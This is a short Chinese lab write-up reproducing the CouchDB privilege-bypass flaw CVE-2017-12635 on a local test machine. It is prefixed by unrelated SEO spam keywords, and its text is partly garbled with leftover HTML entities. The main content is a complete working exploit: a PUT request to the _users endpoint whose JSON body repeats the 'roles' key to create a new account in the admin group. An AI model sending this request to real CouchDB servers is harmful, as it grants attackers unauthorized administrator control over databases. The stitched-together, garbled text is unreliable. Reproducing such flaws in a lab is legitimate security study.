怎么做推广赚钱,南阳优化网站排名,网站建设大赛,青岛做网站建设价格Couchdb 权限绕过漏洞复现#xff08;CVE-2017-12635#xff09;
开启环境给了三个端口号#xff0c;不知道哪个是正常的#xff0c;最后试出来52226端口正常。
登录URL#xff1a;http://192.168.91.129/_utils/#
来到了登录页面
用postman发送PUT方法的…Couchdb 权限绕过漏洞复现CVE-2017-12635
开启环境给了三个端口号不知道哪个是正常的最后试出来52226端口正常。
登录URLhttp://192.168.91.129/_utils/#
来到了登录页面
用postman发送PUT方法的请求包这个请求包会导致数据库创建一个用户在这会把xrzx这个用户创建出来并且加入到admin管理员组里面去
然后再回到登录页面输入刚才创建的账号和密码登录即可
http://192.168.91.129/_users/org.couchdb.user:xrzx
{
type: user,
name: xrzx,
roles: [_admin],
roles: [],
password: admin
}
